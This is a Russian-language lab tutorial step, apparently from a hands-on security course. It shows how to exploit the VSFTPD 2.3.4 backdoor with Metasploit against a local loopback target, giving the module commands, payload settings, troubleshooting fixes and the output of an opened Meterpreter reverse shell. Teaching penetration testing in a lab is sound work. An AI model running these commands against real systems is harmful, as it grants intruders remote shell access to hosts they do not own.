Получение первоначального доступа
На этом этапе вы получите доступ к целевой системе, эксплуатируя бэкдор в службе VSFTPD 2.3.4. Это даст вам сессию Meterpreter для дальнейшей постэксплуатации.
Сначала запустите консоль Metasploit Framework.
msfconsole -q
После запуска Metasploit выберите эксплойт для бэкдора VSFTPD 2.3.4.
use exploit/unix/ftp/vsftpd_234_backdoor
Теперь настройте параметры цели и полезной нагрузки (payload). Поскольку служба запущена на той же машине, мы используем loopback IP. Полезная нагрузка по умолчанию требует настройки LHOST и может выдать ошибку "All encoders failed to encode" — установите кодировщик, чтобы избежать этого:
set RHOSTS 127.0.0.1
set LHOST 127.0.0.1
set Encoder generic/none
Наконец, запустите эксплойт.
exploit
УСТРАНЕНИЕ НЕПОЛАДОК: Если вы видите ошибку Msf::OptionValidateError One or more options failed to validate: LHOST, выполните set LHOST 127.0.0.1. Если вы видите All encoders failed to encode, выполните set Encoder generic/none. Затем снова запустите exploit.
ПРЕДУПРЕЖДЕНИЕ: Первая попытка может завершиться неудачей с сообщением "Unable to connect to backdoor on 6200/TCP. Cooldown?" или "Exploit completed, but no session was created." Если это произошло, просто запустите команду exploit еще раз — вторая попытка должна быть успешной.
В случае успеха будет открыта сессия Meterpreter (сессия 1).
[*] Started reverse TCP handler on 127.0.0.1:4444
[!] 127.0.0.1:21 - The port used by the backdoor bind listener is already open. Trying...
[+] 127.0.0.1:21 - Backdoor has been spawned!
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:xxxxx) at ...
meterpreter >
Теперь у вас есть сессия Meterpreter. Чтобы вернуться к приглашению msf > для следующего шага, нажмите Ctrl+Z, а затем y, когда появится вопрос "Background session 1?".